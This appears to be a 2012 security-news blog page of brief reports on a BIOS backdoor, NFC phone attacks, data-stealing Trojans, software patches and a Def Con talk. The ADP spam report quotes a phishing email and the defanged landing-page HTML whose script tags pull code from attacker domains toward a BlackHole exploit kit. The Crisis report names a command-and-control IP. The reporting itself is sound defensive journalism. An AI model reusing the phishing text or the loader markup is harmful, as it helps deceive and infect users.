Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Breaking News
Breaking News

Researcher demonstrates highly persistent hardware backdoor


Spurred by the conclusion of a recent report that said that given the fact that China is the de-facto manufacturer of most IT equipment in the world, it could easily backdoor any computer well before it's shipped to its buyers, security researcher Jonathan Brossard decided to prove the practicality of such backdooring.

He set out to create a backdoor that is persistent, stealthy, portable, cheap, that allows remote updates and provide remote access, and whose creation and deployment cannot be attributed to any individual or state.

The result was Rakshasa ("demon" in Hindu), a proof-of-concept malware that is able both to replace a computer's motherboard BIOS and to infect the firmware embedded in other peripheral devices through PCI expansion ROMs, thus ensuring its stealthiness and persistency in case the BIOS was ever flashed.

The malware is based on free and open source software, making it harder to detect by antivirus solutions, cheap, and - given the fact that its source code is available to anyone on the Internet - not attributable.

As the current computer architecture allows things like the firmware of a CD-ROM PCI device controlling a PCI network card and peripheral devices accessing RAM, even if the original motherboard BIOS is restored at one point, the rogue firmware on one of those peripheral devices can be used to return the rogue one.

This means that for the computer to be effectively cleaned, the original BIOS must be restored and all the peripherals reflashed simultaneously - not something that typical users know how or are able to do.

Brossard says that the backdoor can be easily added to the hardware when the attacker has physical access to it, and that in the great majority of cases, the remote attack method is also successful.

Rakshasa is comprised of a custom version of Coreboot for the BIOS backend, of a custom SeaBIOS BIOS-payload, a set of PCI expansion ROMs, and a custom active bootkit which is retrieved from the network.

This bootkit is not loaded in the hard disk's Master Boot Record, but (remotely) into the RAM on each boot, making it both practically impossible to detect and easy to unload from memory once it has done what it set out to do, i.e. modify the kernel.

Unfortunately, says Brossard, computer architecture cannot be changed to prevent this type of attack without breaking backward compatibility, so the only thing that remains to do to prevent backdoored hardware to be delivered is to include PCI ROMs and BIOS firmwares in the security audits before usage.

For more specific information about the malware and its capabilities, check out Brossard's paper.
Read more »
Hackers Arrested
Breaking News Cyber Crime Hackers Arrested

Hackers who stole 8.7 million mobile customers data arrested by South Korean police


South Korean police have arrested two malicious hackers who compromised personal data of 8.7 million customers of KT Telecom, the second biggest mobile carrier in South Korea .

The company alerted police on July 13 after detecting traces of hacking attacks. The data was collected for the last five months, starting in February 2012.

Hackers had stolen data such as customers' names, phone numbers and residential registration numbers and sold the information to telemarketing firms.

"It took nearly seven months to develop the hacking program and (the suspects) had very sophisticated hacking skills," a KT Corp. spokesperson told Yonhap News. "In light of this incident, we will strengthen the internal security system and raise awareness of security among all employees to prevent causing inconvenience to customers."

Seven other people were also booked for buying the leaked data for telemarketing purposes, Yonhap said.

The attack, described as one of the country's largest hacking schemes, is estimated to be valued at six figures: police said the two made about 1 billion won ($878,000).

"We deeply bow our head in apology for having your precious personal information leaked... we'll try our best to make such things never happen again," KT said in a statement to customers.
Read more »
Penetration Testing
Backtrack Linux Featured Penetration Testing

BackTrack 5 R3 will be released on Aug 13th, 2012 - BT5 R3


The BackTrack Development team has planned to release an R3 revision of Backtrack Penetration Testing distribution in 2 weeks.

According to the official statment, the new release focuses on bugfixes and over 50 new tool additions – making it the most potent revision yet.

"We have released a BT5 R3 preview in BlackHat Vegas for the enjoyment of conference attendees, which can be found in their delegate bags."

" The DVD contains a BT5 R3 Gnome, 32 bit edition – burnt as an ISO (as opposed to an image). We will be taking in our last bug reports and tool suggestions from the BH / Defcon crowds for our upcoming official release, which will be on August 13th, 2012."

Current BT5 users can simply upgrade to the latest release using the regular update commands. More details will be released along with the full listing of new tools on the 13th of August.
Read more »
Breaking News
Breaking News

NFC Hack: Be very careful what your smartphone gets near


Security Researcher, Charlie Miller, set the Black Hat cybersecurity conference buzzing on Wednesday with a presentation showing off newly discovered vulnerabilities in "near field communications" features on Samsung and Nokia devices.

Near field communication (NFC) is a set of standards for smartphones and similar devices to establish radio communication with each other by touching them together or bringing them into close proximity, usually no more than a few centimetres. Present and anticipated applications include contactless transactions, data exchange, and simplified setup of more complex communications such as Wi-Fi. Communication is also possible between an NFC device and an unpowered NFC chip, called a "tag".

During his presentation, Mr Miller showed how to attack three separate phones: the Samsung Nexus S, the Google Galaxy Nexus - which both run Android - and the Nokia N9, which runs on the MeeGo system.

To attack the phones Mr Miller wrote software to control a reader tag that works in conjunction with NFC. As its name implies, NFC works when devices are brought close together or are placed near a reader chip.

In one demo Mr Miller piped commands through his custom-built chip that abused a feature of the smartphones known as Android beam. This allows phone owners to send links and information over short distances to other handsets.

He discovered that the default setting in Android Beam forces a handset to visit any weblink or open any file sent to it. Via this route he forced handsets to visit websites that ran code written to exploit known vulnerabilities in Android.

"The fact that, without you doing anything, all of a sudden your browser is going to my website, is not ideal," Mr Miller said.

In one demonstration using this attack Mr Miller was able to view files on a target handset.

On the Nokia phone, Mr Miller demonstrated how to abuse NFC and take complete control of a target handset, making it send texts or make calls, via the weaknesses exploited by his customised radio tag.

Mr Miller said that to successfully attack the Android phones they must be running a particular version of the operating system, be unlocked and have their screen active.

Nokia said it was aware of Mr Miller's research and said it was "actively investigating" his claims of success against its N9 phone. It said it was not aware of anyone else abusing loopholes via NFC.

Google has yet to comment on the research.

Read more »
Hackers Conference
Breaking News DefCon Hackers Conference

Keith Alexander, NSA Chief, asks hackers to make internet more secure

National Security Agency Director Gen. Keith Alexander, also the head of the U.S. Cyber Command, took the unprecedented step on Friday of asking a convention of unruly hackers to join him in an effort to make the Internet more secure.

In a speech to the 20th annual Def Con gathering in Las Vegas, four-star General Keith Alexander stressed common ground between U.S. officials and hackers, telling them privacy must be preserved and that they could help by developing new tools.

"You're going to have to come in and help us," Alexander told thousands of attendees.

The conference founder, Jeff Moss, known in hacking circles as the Dark Tangent, told the conference he had invited Alexander, who rarely gives speeches, because he wanted them to learn about one of the world's "spookiest, least known" organisations.

Attendees were respectful and gave modest applause, though several said they were concerned about secret government snooping and the failure of authorities thus far to stop foreign-backed attacks.

"Americans pay taxes so that federal agencies can defend them," said a researcher who asked not to be named. "I see it as a hard sell asking a business entity to spend money for the common good."

Alexander won points by wearing the hacker "uniform" of jeans and a tee shirt, wandering the halls and praising specific hacking efforts, including intrusion detection tools and advances in cryptology.

He also confronted civil liberties concerns that are a major issue for many researchers devoted to the internet.

Taking questions screened by Moss, Alexander denied that the NSA had dossiers on millions of Americans, as some former employees have suggested.

"The people who would say we are doing that should know better," he said. "That is absolute nonsense."

Alexander used the speech to lobby for a cyber security bill moving through the Senate that would make it easier for companies under attack to share information with the government and each other as well as give critical infrastructure owners some reward for adhering to future security standards.

"Both parties see this as a significant problem," he said, adding that the experts like those at Def Con should help in the process. "What are the standards that we should jointly set that critical networks should have?"

In addition to conducting electronic intelligence gathering, primarily overseas, the defence-department-controlled NSA is charged with protecting the American army from cyber-attacks.

Increasingly, it has been sharing its findings with the FBI to aid in criminal cases and with the department of homeland security, which warns specific industries of new threats.

Displaying a slide with the logos of several dozen of companies breached by criminals or spies in the past two years, Alexander said only the most competent even knew they had been hacked.

"There are 10 times, almost 100 times more companies that don't know they have been hacked," he said.
Read more »
Software Release
Network Analyzer Softwares Security Tools Software Release

Wireshark released version 1.8.1 and 1.6.9 to close critical vulnerability


Wireshark Team have released versions 1.8.1 and 1.6.9 to close important vulnerabilities in their open source network protocol analyser.

The vulnerabilities are a problem in the Point-to-Point Protocol (PPP) dissector that leads to a crash and a bug in the Network File System (NFS) dissector that could result in excessive consumption of CPU resources; to take advantage of the holes, an attacker must inject a malformed packet onto the wire or convince a victim to read a malformed packet trace file.

Versions 1.4.0 to 1.4.13, 1.6.0 to 1.6.8 and 1.8.0 are affected; Users are advised to upgrade to 1.6.9 and 1.8.1 to fix the problem.

Wireshark 1.6.9 and 1.8.1 are available to download
Read more »
Malware Report
Breaking News Malware Report

Data stealing Trojan masquerade as Android Battery App


An Android application lure users with the promise of increased battery performance upon installation but it is a Trojan.  The Trojan covertly scans address books and broadcasts phone numbers and email addresses to an attacker-controlled domain.

After sending all contact details, it displays an image with a GONE visibility state, followed by a message written in Chinese lanaguage. "I am sorry. Your terminal is not available or unsupported" Translated from Chinese.

Users then believe the app really isn’t compatible with their handset and usually uninstall it, believing nothing happened.

"Although the message is in Chinese, the Trojan is perfectly capable of infecting any Android-running device and scan address books regardless of region or carrier. " BitDefender researcher says.

The application does nothing to improve battery performance and users are left believing their device was simply incompatible with the app. Even the app’s icon is pretty convincing, displaying a green battery logo.
Read more »
Software Release
Software Release

Apple released Safari v6.0 that addresses numerous security vulnerabilities

Alongside the release of OS X 10.8 Mountain Lion earlier today, Apple has published version 6.0 of its Safari web browser for OS X 10.7 Lion, adding a number of new features and closing numerous security holes.

According to the company, the major update addresses more than 120 vulnerabilities found in the previous 5.x branch.

Among the holes closed are problems in the handling of feed:// URLs could have led to cross-site scripting (XSS) attacks or users' files being sent to a remote server. A bug in the autocomplete system used by Safari, which may have resulted in passwords being automatically inserted even when a site specifies that it shouldn't be, has been fixed, as has an XSS issue caused by opening maliciously crafted files on certain pages.

A full list of security fixes can be found in Apple's security advisory. Users running Mac OS X 10.7.4 can upgrade to Safari 6 using the built-in Software update function. All users are advised to upgrade as soon as possible.
Read more »
Spam Report
BlackHole Exploit Spam Report

ADP Notification mail leads to BlackHole Exploit Kit

Researchers at MX Lab, started to intercept a spam mail campaign that masquerade as ADP Notification mail.The mail intercepted by researchers has subjects like "ADP Funding Notification " and "ADP Security Management Update".

The email is send from the spoofed addresses ADPClientServices@adp.com, ADPClientServices@adp.com, the email address may vary.

One of the intercepted spam mail content:
Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services
Once user clicks the link provided in the spam mail, he will be taken to a website which has the following script:
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://cyberku.co.cc/s8XVniQE/js.js”></script>
<script type=”text/javascript” src=”hxxp://maccvision.com/vS5qA1sz/js.js”></script>
</html>
Both javascript contains same script that will redirects you to' hxxp://216.119.142.129/view.php?s=7058dba9af062ccf'.  The URL hosts BlackHole Exploit Kit which use the plugin version 0.7.8 (the latest version BlackHole Exploit kit).



BlackHole Exploit kit tries to take advantage of the vulnerability reside in the victim system. After successful exploitation, it downloads a malicious file called 'info.exe'.  The detection ratio of this malware is 2/42 (VirusTotal).
Read more »
Spam Report
Breaking News Citadel Scam Report Spam Report

Facebook virus: Citadel targets Facebook Users with Children’s Charity Scam


Security researchers from Trusteer , have discovered a new variant of the Citadel malware that injects itself into your Facebook webpages and demands that you make a donation to a fake charity for sick children.

After users have logged into their Facebook account, the Citadel injection mechanism displays a pop up that encourages the victim to donate $1 to children who “desperately” need humanitarian aid.Next, it asks you for your name, credit card number, expiration date, CVV, and security password.

What makes this attack particularly sophisticated is the malware configured to deliver the attack based on the user's country/language settings, with web-injection pages in five different languages: English, Italian, Spanish, German and Dutch.

In an interesting twist, the criminals do not reuse the same text for every language. Instead, they have customized each attack based on the victim’s country and/or region.

"This attack illustrates the continuing customization of financial malware and harvesting of credit card data from the global base of Facebook users. Using children’s charities as a scam makes this attack believable and effective," a Trusteer spokesperson wrote.

"Meanwhile, the one dollar donation amount is low enough that virtually anyone can contribute if they choose. This is a well-designed method for stealing credit and debit card data on a massive scale."
Read more »
Malware Report
Breaking News Malware Report

New Mac Trojan called OSX/Crisis discovered by Intego



Mac Security firm, Intego, has discovered a new Mac OS X Trojan referred to as OSX/Crisis. The malware installs itself without user interaction and also does not need your user password to infect your Apple Mac.

The threat works only in the two latest versions of Mac OS X – Snow Leopard and Lion.

The Trojan preserves itself against reboots, so it will continue to run until it’s removed. Depending on whether or not the dropper runs on a user account with Admin permissions, it will install different components.

If the dropper runs on a system with Admin permissions, it will drop a rootkit to hide itself. In either case, it creates a number of files and folders to complete its tasks. It creates 17 files when it’s run with Admin permissions, 14 files when it’s run without. Many of these are randomly named, but there are some that are consistent.

  • With or without Admin permissions, this folder is created:
    • /Library/ScriptingAdditions/appleHID/
  • Only with Admin permissions, this folder is created:
    • /System/Library/Frameworks/Foundation.framework/XPCServices/

Once installed, OS/X Crisis calls home to IP address 176.58.100.37 every five minutes, presumably to await instructions.

Here's where it gets interesting. "The file is created in a way that is intended to make reverse engineering tools more difficult to use when analyzing the file," an Intego spokesperson said in a statement. "This sort of anti-analysis technique is common in Windows malware, but is relatively uncommon for OS X malware."
Read more »
Subscribe to: Comments (Atom)